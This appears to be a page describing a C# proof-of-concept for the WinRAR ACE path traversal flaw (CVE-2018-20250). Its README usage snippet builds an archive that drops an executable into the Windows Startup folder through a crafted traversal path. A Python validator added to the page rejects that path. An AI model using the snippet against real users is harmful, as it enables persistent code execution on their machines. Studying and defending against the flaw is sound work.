CVE-2018-20250 PoC — WinRar Path Traversal Vulnerability

Source
Associated Vulnerability
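Title: WinRar Path Traversal Vulnerability (CVE-2018-20250)
Description: WinRAR is a file archiver. It supports compressing and decompressing files in RAR, ZIP and other formats. WinRar contains a directory traversal vulnerability. The vulnerability stems from WinRAR not sufficiently filtering the "filename" field of the ACE file header structure while extracting ACE-format files. An attacker can exploit this vulnerability to execute arbitrary code with elevated privileges.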
Description
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).
Readme
# CVE-2018-20250-WinRAR-ACE
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

# Resources
- https://research.checkpoint.com/extracting-code-execution-from-winrar/
- https://github.com/droe/acefile
- https://apidoc.roe.ch/acefile/latest/

# Dependencies
InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

# How to use
```csharp
  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");
```
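
Seen from the extraction side, the destination string above is the kind of member name an unpacker or archive scanner has to refuse before writing anything. The check below is an added example, not code from this repository or from WinRAR; the function names and the `C:\extract` base directory are hypothetical, and every sample name other than the one copied from the snippet above is constructed.

```python
import ntpath  # Windows path rules; importable on any OS

# Destination string copied from the usage snippet on this page.
PAGE_NAME = (r"C:\C:C:../AppData\Roaming\Microsoft\Windows"
             r"\Start Menu\Programs\Startup\some_file.exe")

def member_name_problems(name):
    """Return the reasons an archive member name is unsafe as a Windows extraction path."""
    norm = name.replace("/", "\\")
    drive, rest = ntpath.splitdrive(norm)
    parts = [p for p in rest.split("\\") if p]
    problems = []
    if drive:
        problems.append("drive or UNC prefix")
    if rest.startswith("\\"):
        problems.append("rooted path")
    if ".." in parts:
        problems.append("parent-directory component")
    # A colon left inside a component is a further drive prefix or an NTFS
    # alternate data stream. In PAGE_NAME the ".." is glued to "C:C:", so the
    # exact-match ".." test above does not fire; this test does.
    if any(":" in p for p in parts):
        problems.append("colon inside a component")
    if not parts:
        problems.append("empty name")
    return problems

def resolve_inside(base, name):
    """Return the destination for name under base, or None if the name is rejected."""
    if member_name_problems(name):
        return None
    dest = ntpath.normpath(ntpath.join(base, name.replace("/", "\\")))
    # Second line of defence: the normalised result must still sit under base.
    if ntpath.commonpath([base, dest]).lower() != ntpath.normpath(base).lower():
        return None
    return dest

if __name__ == "__main__":
    # Constructed sample names, except PAGE_NAME.
    for sample in (PAGE_NAME, r"C:../AppData\x.exe", r"..\..\x.exe", "docs/readme.txt"):
        print(repr(sample), member_name_problems(sample),
              resolve_inside(r"C:\extract", sample))
```

The page's string is rejected on three independent grounds, which is why a filter that removes only one leading prefix and then re-checks nothing is not enough.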

# Bugs
It seems that it only extracts to the Startup folder when the .rar file is on the Desktop or in any folder at the same level.
File Snapshot

```
[4.0K] /data/pocs/8cea497a8987d7cee82a1813697485d52d35ca04
├── [6.6K] AceFile.cs
├── [6.2K] AceVolume.cs
├── [ 787] README.md
└── [ 415] Utils.cs

0 directories, 4 files
```